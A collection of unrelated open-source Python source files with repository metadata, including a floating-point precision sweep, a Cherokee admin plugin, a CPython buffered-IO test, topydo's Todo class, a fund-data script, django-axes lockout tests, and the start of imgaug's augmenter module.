return math.inf, math.inf, math.inf, math.inf
def init_prec():
return 16
def neighbor_prec(x):
nearby = 5
for neighbor in range(x-nearby, x+nearby+1):
if 1 <= neighbor <= 4096 and neighbor != x:
yield neighbor
vec_inits = (init_prec,) * 2
vec_neighbors = (neighbor_prec,) * 2
vec_metrics = (operator.lt,) * 4
filtered_metrics = (operator.lt, None, None, operator.lt)
def run_sweep(trials, n, ctx, template, signed=True):
global_settings.cfg(trials, n, ctx, template, signed=signed)
frontier = search.sweep_random_init(vec_stage, vec_inits, vec_neighbors, vec_metrics)
filtered_frontier = search.filter_frontier(frontier, filtered_metrics)
sorted_frontier = sorted(filtered_frontier, key=lambda x: x[1][0])
for data, measures in sorted_frontier:
print('\t'.join(str(m) for m in measures))
for data, measures in sorted_frontier:
describe_stage(*data)
print()
bf16 = ieee754.ieee_ctx(8, 16)
f16 = ieee754.ieee_ctx(5, 16)
p16 = posit.posit_ctx(0, 16)
p16_1 = posit.posit_ctx(1, 16)
# some results
from math import inf as inf
# run_sweep(100, 1000, bf16, dotprod_naive_template)
stuff = [
((16, 5), (21, 0, 12, 0.57)),
((17, 5), (22, 0, 4, 0.19)),
((18, 5), (23, 0, 1, 0.04)),
((20, 5), (25, 0, 0, 0.0)),
((11, 5), (16, 0, 1928, 60.58)),
((13, 5), (18, 0, 1660, 31.54)),
((14, 5), (19, 0, 190, 5.18)),
((15, 5), (20, 0, 72, 2.01)),
((4, 6), (10, 0, 125090, 5556.55)),
((5, 6), (11, 0, 64674, 3095.17)),
((7, 5), (12, 0, 16034, 803.76)),
((8, 5), (13, 0, 8034, 500.84)),
((10, 5), (15, 0, 1970, 93.25)),
((1, 1), (2, 100, inf, inf)),
((1, 8), (9, 23, inf, inf)),
((5, 3), (8, 94, inf, inf)),
]
# run_sweep(100, 1000, bf16, dotprod_bin_template)
# improvement stopped at generation 7:
stuff = [
((16, 5), (21, 0, 5, 0.17)),
((17, 5), (22, 0, 2, 0.07)),
((18, 5), (23, 0, 1, 0.03)),
((21, 5), (26, 0, 0, 0.0)),
((11, 5), (16, 0, 247, 8.6)),
((12, 5), (17, 0, 125, 3.98)),
((13, 5), (18, 0, 61, 1.86)),
((14, 5), (19, 0, 30, 0.86)),
((15, 5), (20, 0, 13, 0.42)),
((3, 6), (9, 0, 62815, 2184.57)),
((4, 6), (10, 0, 32479, 1237.56)),
((6, 5), (11, 0, 15744, 733.06)),
((7, 5), (12, 0, 3887, 162.52)),
((8, 5), (13, 0, 1983, 81.96)),
((10, 5), (15, 0, 503, 19.36)),
((1, 1), (2, 100, inf, inf)),
((1, 7), (8, 40, inf, inf)),
((4, 3), (7, 88, inf, inf)),
]
# run_sweep(100, 1000, p16, dotprod_naive_template)
# improvement stopped at generation 7:
stuff = [
((16, 5), (21, 0, 127, 17.63)),
((17, 5), (22, 0, 64, 8.68)),
((18, 5), (23, 0, 32, 4.31)),
((19, 5), (24, 0, 16, 2.15)),
((20, 5), (25, 0, 8, 1.02)),
((21, 5), (26, 0, 4, 0.47)),
((6, 6), (12, 0, 129717, 28580.59)),
((11, 5), (16, 0, 4084, 603.34)),
((12, 5), (17, 0, 2032, 298.69)),
((13, 5), (18, 0, 1029, 146.11)),
((14, 5), (19, 0, 510, 73.76)),
((15, 5), (20, 0, 258, 36.43)),
((22, 5), (27, 0, 2, 0.2)),
((23, 5), (28, 0, 1, 0.06)),
((26, 5), (31, 0, 0, 0.0)),
((4, 6), (10, 0, 517871, 73538.57)),
((5, 6), (11, 0, 259311, 47042.38)),
((8, 5), (13, 0, 33455, 6982.4)),
((9, 5), (14, 0, 16495, 2870.68)),
((10, 5), (15, 0, 8143, 1276.26)),
((1, 1), (2, 100, inf, inf)),
((1, 8), (9, 37, inf, inf)),
((4, 3), (7, 99, inf, inf)),
((4, 4), (8, 96, inf, inf)),
]
# run_sweep(100, 1000, p16, dotprod_bin_template)
# improvement stopped at generation 7:
stuff = [
((16, 6), (22, 0, 64, 10.26)),
((17, 6), (23, 0, 32, 5.14)),
((18, 6), (24, 0, 16, 2.57)),
((19, 6), (25, 0, 9, 1.25)),
((20, 6), (26, 0, 4, 0.63)),
((21, 6), (27, 0, 2, 0.31)),
((11, 6), (17, 0, 2085, 332.43)),
((12, 6), (18, 0, 1087, 166.34)),
((13, 6), (19, 0, 547, 82.46)),
((14, 6), (20, 0, 261, 41.09)),
((15, 6), (21, 0, 130, 20.56)),
((22, 6), (28, 0, 1, 0.13)),
((26, 6), (32, 0, 0, 0.0)),
((3, 6), (9, 0, 539674, 91906.36)),
((6, 5), (11, 0, 67363, 16120.78)),
((7, 5), (12, 0, 34520, 6755.21)),
((8, 5), (13, 0, 16794, 3023.6)),
((9, 5), (14, 0, 8340, 1413.98)),
((10, 5), (15, 0, 4180, 681.31)),
((1, 1), (2, 100, inf, inf)),
((1, 7), (8, 42, inf, inf)),
((3, 3), (6, 99, inf, inf)),
((4, 3), (7, 91, inf, inf)),
((5, 5), (10, 0, 136730, 28892.4)),
]
|
billzorn/fpunreal
|
titanfp/vec_sweep.py
|
Python
|
mit
| 11,896 | 0.00269 |
# -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
dialog += submit
self += dialog
add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
|
mdavid/cherokee-webserver-svnclone
|
admin/plugins/wildcard.py
|
Python
|
gpl-2.0
| 3,364 | 0.012485 |
import unittest
from test import support
import io # C implementation.
import _pyio as pyio # Python implementation.
# Simple test to ensure that optimizations in the IO library deliver the
# expected results. For best testing, run this under a debug-build Python too
# (to exercise asserts in the C code).
lengths = list(range(1, 257)) + [512, 1000, 1024, 2048, 4096, 8192, 10000,
16384, 32768, 65536, 1000000]
class BufferSizeTest(unittest.TestCase):
def try_one(self, s):
# Write s + "\n" + s to file, then open it and ensure that successive
# .readline()s deliver what we wrote.
# Ensure we can open TESTFN for writing.
support.unlink(support.TESTFN)
# Since C doesn't guarantee we can write/read arbitrary bytes in text
# files, use binary mode.
f = self.open(support.TESTFN, "wb")
try:
# write once with \n and once without
f.write(s)
f.write(b"\n")
f.write(s)
f.close()
f = open(support.TESTFN, "rb")
line = f.readline()
self.assertEqual(line, s + b"\n")
line = f.readline()
self.assertEqual(line, s)
line = f.readline()
self.assertTrue(not line) # Must be at EOF
f.close()
finally:
support.unlink(support.TESTFN)
def drive_one(self, pattern):
for length in lengths:
# Repeat string 'pattern' as often as needed to reach total length
# 'length'. Then call try_one with that string, a string one larger
# than that, and a string one smaller than that. Try this with all
# small sizes and various powers of 2, so we exercise all likely
# stdio buffer sizes, and "off by one" errors on both sides.
q, r = divmod(length, len(pattern))
teststring = pattern * q + pattern[:r]
self.assertEqual(len(teststring), length)
self.try_one(teststring)
self.try_one(teststring + b"x")
self.try_one(teststring[:-1])
def test_primepat(self):
# A pattern with prime length, to avoid simple relationships with
# stdio buffer sizes.
self.drive_one(b"1234567890\00\01\02\03\04\05\06")
def test_nullpat(self):
self.drive_one(bytes(1000))
class CBufferSizeTest(BufferSizeTest):
open = io.open
class PyBufferSizeTest(BufferSizeTest):
open = staticmethod(pyio.open)
def test_main():
support.run_unittest(CBufferSizeTest, PyBufferSizeTest)
if __name__ == "__main__":
test_main()
|
837468220/python-for-android
|
python3-alpha/python3-src/Lib/test/test_bufio.py
|
Python
|
apache-2.0
| 2,654 | 0.002638 |
# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topydo.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module provides the Todo class.
"""
from datetime import date
from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date
class Todo(TodoBase):
"""
This class adds common functionality with respect to dates to the Todo
base class, mainly by interpreting the start and due dates of task.
"""
def __init__(self, p_str):
TodoBase.__init__(self, p_str)
self.attributes = {}
def get_date(self, p_tag):
""" Given a date tag, return a date object. """
string = self.tag_value(p_tag)
result = None
try:
result = date_string_to_date(string) if string else None
except ValueError:
pass
return result
def start_date(self):
""" Returns a date object of the todo's start date. """
return self.get_date(config().tag_start())
def due_date(self):
""" Returns a date object of the todo's due date. """
return self.get_date(config().tag_due())
def is_active(self):
"""
Returns True when the start date is today or in the past and the
task has not yet been completed.
"""
start = self.start_date()
return not self.is_completed() and (not start or start <= date.today())
def is_overdue(self):
"""
Returns True when the due date is in the past and the task has not
yet been completed.
"""
return not self.is_completed() and self.days_till_due() < 0
def days_till_due(self):
"""
Returns the number of days till the due date. Returns a negative number
of days when the due date is in the past.
Returns 0 when the task has no due date.
"""
due = self.due_date()
if due:
diff = due - date.today()
return diff.days
return 0
def length(self):
"""
Returns the length (in days) of the task, by considering the start date
and the due date. When there is no start date, its creation date is
used. Returns 0 when one of these dates is missing.
"""
start = self.start_date() or self.creation_date()
due = self.due_date()
if start and due and start < due:
diff = due - start
return diff.days
else:
return 0
|
bram85/topydo
|
topydo/lib/Todo.py
|
Python
|
gpl-3.0
| 3,165 | 0 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
from __future__ import print_function
__author__ = 'gpanda'
"""References:
[1] easy thread-safe queque, http://pymotw.com/2/Queue/
"""
import argparse
import collections
import fileinput
import os
import pprint
import re
import string
import sys
import threading
import time
import Queue
from libs import driver
from libs.common import LOG, is_sec_id, AbriskError
config = {}
class Fund(object):
"""Fund data structure
pbr = price / book value (nav), an important index to sort funds
"""
def __init__(self, secId, name=None, time=None, price=float(0),
volume=float(0), nav=float(1)):
"""Initialize Fund object
:param secId: security id
:param name: name
:param time: data timestamp
:param price: security price
:param volume: exchange volume (unit: 0.1 billion)
:param nav: security (fund) net asset value or book value
"""
self.secId = secId
self.name = name
self.time = time
self.price = price
self.volume = volume
self.nav = nav
self.pbr = self.price / self.nav
def __cmp__(self, other):
return cmp(self.pbr, other.pbr)
def _initialize_input_parser():
parser = argparse.ArgumentParser(
description="Show me interesting funds."
)
parser.add_argument(
'--fin',
default="default.0",
nargs="*",
metavar="FILE",
help="Security list input file."
)
parser.add_argument(
'--workers',
default=5,
nargs="?",
metavar="COUNT",
help="Working thread count."
)
parser.add_argument(
'--head', '-H',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the top rank to show."
)
parser.add_argument(
'--tail', '-T',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the bottom rank to show."
)
parser.add_argument(
'--funds', '-f',
nargs="*",
metavar="FUND INDEX",
help="One or more specified funds."
)
parser.add_argument(
'-v', '--verbose',
action="store_true",
help="Show debug messages."
)
return parser
def _parse_input_0(opts):
global config
global LOG
# retrieve fund list files
files = opts['fin']
if not isinstance(files, list):
files = [files]
config['fin'] = files
workers = int(opts['workers'])
if workers > 0:
config['workers'] = workers
head = int(opts['head'])
if head > 0:
config['head'] = head
tail = int(opts['tail'])
if tail > 0:
config['tail'] = tail
funds = opts['funds']
if not isinstance(funds, list):
funds = [funds]
config['funds'] = funds
if opts['verbose']:
config['debug'] = True
LOG.setLevel(logging.DEBUG)
return config
def _parse_input_1(cfg):
"""
TODO: comments
"""
# pprint.pprint(config)
fund_pool = collections.OrderedDict()
files = cfg['fin']
for yaf in files:
if os.path.exists(yaf):
filename = os.path.basename(yaf)
# print("{filename}".format(filename=filename))
fund_pool[filename] = collections.OrderedDict()
for line in fileinput.input(yaf):
if line.startswith("#"):
continue
fields = line.split(',')
sid = string.strip(fields[0])
if is_sec_id(sid):
fund_pool[filename][sid] = [].extend(fields[1:])
funds = config['funds']
if funds[0]:
category = 'Quick_show'
fund_pool[category] = collections.OrderedDict()
for fund in funds:
if is_sec_id(fund):
fund_pool[category][fund] = []
return fund_pool
def work_flow(input_queues, output_queues, error_queues):
"""
TODO: comments
"""
local = threading.local()
local.thread_name = threading.current_thread().getName()
LOG.debug("*** Enters work_flow() >>>")
# print("*** Thread-{0}:{1} *** Enters work_flow >>>"
# .format(local.thread_name, time.time()))
def retrieve_data(sid):
"""
TODO: comments
"""
LOG.debug("Retrieving data for %s", sid)
# print("Thread-{0}: Retrieving data for {1}"
# .format(local.thread_name, sid))
fund_raw_data = driver.getpbr(sid)
if not fund_raw_data:
return None
fund = Fund(sid,
name=fund_raw_data[2],
time=fund_raw_data[0],
price=fund_raw_data[4],
volume=fund_raw_data[5],
nav=fund_raw_data[3],
)
# driver.show(fund_raw_data)
return fund
for c, iq in input_queues.items():
sid=None
try:
LOG.debug("Switching to category %s", c)
# print("Thread-{0}: Switching to category {1}"
# .format(local.thread_name, c))
while not iq.empty():
sid = iq.get(False)
fund = retrieve_data(sid)
if fund:
output_queues[c].put(fund)
LOG.debug("Leaving category %s", c)
# print("Thread-{0}: Leaving category {1}"
# .format(local.thread_name, c))
except Queue.Empty as e:
LOG.info("Unexpected Queue.Empty Exception occurs, %s", e)
except Exception as e:
ename = "T:[" + local.thread_name + "]C:[" + c + "]S:[" + sid + "]"
error_queues[c].put(AbriskError(ename, e))
LOG.debug("*** Exits from work_flow() <<<")
# print("*** Thread-{0} *** Exits from work_flow <<<"
# .format(local.thread_name))
def sync(fund_pool):
"""Central controller of fund data synchronization.
** Preparing working queue (FIFO) and workers for funds of interest.
** Preparing data queue (Heap) for storing and sorting collected data.
** Retrieving fund data, refining and sorting them.
"""
input_queues = {}
output_queues = {}
error_queues = {}
for category, pool in fund_pool.items():
input_queues[category] = Queue.Queue(len(pool))
for sid in sorted(pool.keys()):
input_queues[category].put(sid)
output_queues[category] = Queue.PriorityQueue(len(pool))
error_queues[category] = Queue.Queue(len(pool))
workers = {}
worker_number = config['workers']
for i in range(worker_number):
workers[i] = threading.Thread(
target=work_flow,
name=str(i),
args=[input_queues, output_queues, error_queues],
)
workers[i].start()
for worker in workers.values():
worker.join()
rc = 0
for c, eq in error_queues.items():
if not eq.empty():
rc = 1
break
if rc == 0:
LOG.debug("All jobs have been done without errors.")
else:
LOG.debug("All jobs have been done, but there are errors.")
return output_queues, error_queues, rc
def report_fund_list(out_put_queues):
for category, priority_queue in out_put_queues.items():
LOG.debug("Category-%s", category)
# print("Category-{0}".format(category))
driver.setup_output(0, LOG)
driver.print_header()
while not priority_queue.empty():
fund = priority_queue.get()
driver.print_row((fund.time, fund.secId, fund.name,
fund.nav, fund.price, fund.volume,
fund.pbr))
def show_fund_pool(fund_pool):
for category, pool in fund_pool.items():
LOG.debug("Category %s", category)
# print("Category {category}".format(category=category))
for sid, extras in pool.items():
LOG.debug("%s, %s", sid, extras)
# print("{0}, {1}".format(sid, extras))
def main():
"""
TODO: no comments
"""
parser = _initialize_input_parser()
opts = vars(parser.parse_args(sys.argv[1:]))
cfg = _parse_input_0(opts)
fund_pool = _parse_input_1(cfg)
# show_fund_pool(fund_pool)
begin = time.time()
funds, errors, rc = sync(fund_pool)
if rc != 0:
for c, eq in errors.items():
print(c, file=sys.stderr)
while not eq.empty():
print(eq.get().name, file=sys.stderr)
sys.exit(1)
end = time.time()
report_fund_list(funds)
LOG.debug("Time usage: %s seconds; Workers: %s",
end - begin, config['workers'])
# print("Time usage: {0} seconds; Workers: {1}"
# .format(end - begin, config['workers']))
if __name__ == '__main__':
main()
|
gpanda/abrisk
|
fundlist.py
|
Python
|
gpl-2.0
| 8,887 | 0.000788 |
#
# Functions for interacting with the network_types table in the database
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
from PLC.Faults import *
from PLC.Parameter import Parameter
from PLC.Table import Row, Table
class NetworkType(Row):
"""
Representation of a row in the network_types table. To use,
instantiate with a dict of values.
"""
table_name = 'network_types'
primary_key = 'type'
join_tables = ['interfaces']
fields = {
'type': Parameter(str, "Network type", max = 20),
}
def validate_type(self, name):
# Make sure name is not blank
if not len(name):
raise PLCInvalidArgument("Network type must be specified")
# Make sure network type does not alredy exist
conflicts = NetworkTypes(self.api, [name])
if conflicts:
raise PLCInvalidArgument("Network type name already in use")
return name
class NetworkTypes(Table):
"""
Representation of the network_types table in the database.
"""
def __init__(self, api, types = None):
Table.__init__(self, api, NetworkType)
sql = "SELECT %s FROM network_types" % \
", ".join(NetworkType.fields)
if types:
sql += " WHERE type IN (%s)" % ", ".join( [ api.db.quote (t) for t in types ] )
self.selectall(sql)
|
dreibh/planetlab-lxc-plcapi
|
PLC/NetworkTypes.py
|
Python
|
bsd-3-clause
| 1,417 | 0.008469 |
from setuptools import setup
setup(
name="example",
version="0.1",
py_modules=["readdir"],
setup_requires=["cffi>=1.0.dev0"],
cffi_modules=["readdir_build.py:ffi"],
install_requires=["cffi>=1.0.dev0"],
zip_safe=False,
)
|
hipnusleo/laserjet
|
resource/pypi/cffi-1.9.1/demo/readdir_setup.py
|
Python
|
apache-2.0
| 260 | 0 |
from unittest.mock import patch
from django.http import HttpRequest
from django.test import override_settings
from django.utils.timezone import now
from axes.attempts import get_cool_off_threshold
from axes.models import AccessAttempt
from axes.utils import reset, reset_request
from tests.base import AxesTestCase
class GetCoolOffThresholdTestCase(AxesTestCase):
@override_settings(AXES_COOLOFF_TIME=42)
def test_get_cool_off_threshold(self):
timestamp = now()
with patch("axes.attempts.now", return_value=timestamp):
attempt_time = timestamp
threshold_now = get_cool_off_threshold(attempt_time)
attempt_time = None
threshold_none = get_cool_off_threshold(attempt_time)
self.assertEqual(threshold_now, threshold_none)
@override_settings(AXES_COOLOFF_TIME=None)
def test_get_cool_off_threshold_error(self):
with self.assertRaises(TypeError):
get_cool_off_threshold()
class ResetTestCase(AxesTestCase):
def test_reset(self):
self.create_attempt()
reset()
self.assertFalse(AccessAttempt.objects.count())
def test_reset_ip(self):
self.create_attempt(ip_address=self.ip_address)
reset(ip=self.ip_address)
self.assertFalse(AccessAttempt.objects.count())
def test_reset_username(self):
self.create_attempt(username=self.username)
reset(username=self.username)
self.assertFalse(AccessAttempt.objects.count())
class ResetResponseTestCase(AxesTestCase):
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
self.request = HttpRequest()
def test_reset(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
def test_reset_username(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip_username(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_user_failures(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_user_failures(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_user_or_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_user_or_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_user_and_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_ip_user_and_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_AND=True)
def test_reset_ip_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
|
jazzband/django-axes
|
tests/test_attempts.py
|
Python
|
mit
| 5,846 | 0 |
from os.path import expanduser
######################
# Common project files
######################
# These are files, packages, and folders that will be copied from the
# development folder to the destination obfuscated project.
######################
# Python packages to obfuscate.
obfuscated_packages = [
'controller',
'db',
'dbdata',
'logic',
'migrations',
'platform_api',
'tests',
'view'
]
# Non-python folders and Python packages that are not obfuscated.
# Note: Tests are a special case: both obfuscated and unobfuscated versions
# are desired.
unobfuscated_folders = [
'csvlite',
'fonts',
'help',
'images', 'initial_data', 'international',
'kivygraph',
'tests',
]
# Required files or types in the project directory (that is, the base
# directory in which all the common packages exist in) that must be
# obfuscated. For example, main.py is not in any of the common packages, but
# should be obfuscated and included in the project, so *.py (or alternatively,
# main.py) is included here.
obfuscated_root_files = [
'*.kv',
'*.py',
]
# Required files or types in the project directory that should not be
# obfuscated.
unobfuscated_root_files = [
'*.ini',
'*.txt',
]
#####################
# Default directories
#####################
# A project is moved through directories as follows:
# 1. It is copied into IMPORTED (use import_project/fabfile.py).
# 2. The IMPORTED project is obfuscated and written into OBFUSCATED (run
# pymixup.py).
# 3. When an obfuscated project is ready to test, it is copied into
# EXPORTED for a particular platform (e.g., for ios, use
# export_ios/fabfile.py).
# If no platform is specified, it will be copied into a folder called
# "default".
# 4. When an exported project is deployed, it is copied into DEPLOYED under
# its version number.
#
# Note that files in IMPORTED, OBFUSCATED, and EXPORTED are overwritten with
# each refresh from the development project. When a project is deployed,
# however, a permanent copy is retained under its version number.
#####################
# Project name. This should be the name of the last folder in the project
# path. The name is appended to the directories below.
project_name = 'MyProject'
# The base directory of the project to obfuscate.
# For example, the base directory of a project in '~/projects/MyProject' would
# be '~/projects'
project_base_dir = expanduser('~/PycharmProjects')
# The directory to copy the imported development project files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name will be appended to the directory.
# For example, specify '~/projects/IMPORTED' to have the files from the
# project MyProject copied into '~/projects/IMPORTED/MyProject'.
imported_dir = expanduser('~/projects/IMPORTED')
# The directory to write the obfuscated files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/OBFUSCATED' is specified, then the project
# MyProject obfuscated for the android platform will be placed in
# '~/projects/OBFUSCATED/MyProject/android'.
obfuscated_dir = expanduser('~/projects/OBFUSCATED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject exported for the android platform will be placed in
# '~/projects/EXPORTED/MyProject/android'.
exported_dir = expanduser('~/projects/EXPORTED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject deployed for the android platform for version 1.3.2 will be placed
# in '~/projects/DEPLOYED/MyProject/android/1.3.2'.
deployed_dir = expanduser('~/projects/DEPLOYED')
# The directory that contains extra files and folders needed for the project.
extras_dir = expanduser('~/project/EXTRAS')
|
rdevost/pymixup
|
common/settings.py
|
Python
|
mit
| 4,238 | 0 |
from __future__ import print_function, division, absolute_import
from . import imgaug as ia
from .parameters import StochasticParameter, Deterministic, Binomial, Choice, DiscreteUniform, Normal, Uniform
from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy as copy_module
import re
import math
from scipy import misc, ndimage
from skimage import transform as tf, segmentation, measure
import itertools
import cv2
import six
import six.moves as sm
import types
"""
TODOs
- check if all get_parameters() implementations really return all parameters.
- Add Alpha augmenter
- Add WithChannels augmenter
- Add SpatialDropout augmenter
- Add CoarseDropout shortcut function
- Add Hue and Saturation augmenters
"""
@six.add_metaclass(ABCMeta)
class Augmenter(object):
"""Base class for Augmenter objects
Parameters
----------
name : string, optional
Name given to an Augmenter object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
super(Augmenter, self).__init__()
if name is None:
self.name = "Unnamed%s" % (self.__class__.__name__,)
else:
self.name = name
self.deterministic = deterministic
if random_state is None:
if self.deterministic:
self.random_state = ia.new_random_state()
else:
self.random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
self.random_state = random_state
else:
self.random_state = np.random.RandomState(random_state)
self.activated = True
def augment_batches(self, batches, hooks=None):
"""Augment images, batch-wise
Parameters
----------
batches : array-like, shape = (num_samples, height, width, channels)
image batch to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
augmented_batch : array-like, shape = (num_samples, height, width, channels)
corresponding batch of augmented images
"""
assert isinstance(batches, list)
return [self.augment_images(batch, hooks=hooks) for batch in batches]
def augment_image(self, image, hooks=None):
"""Augment a single image
Parameters
----------
image : array-like, shape = (height, width, channels)
The image to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
img : array-like, shape = (height, width, channels)
The corresponding augmented image
"""
assert len(image.shape) == 3, "Expected image to have shape (height, width, channels), got shape %s." % (image.shape,)
return self.augment_images([image], hooks=hooks)[0]
def augment_images(self, images, parents=None, hooks=None):
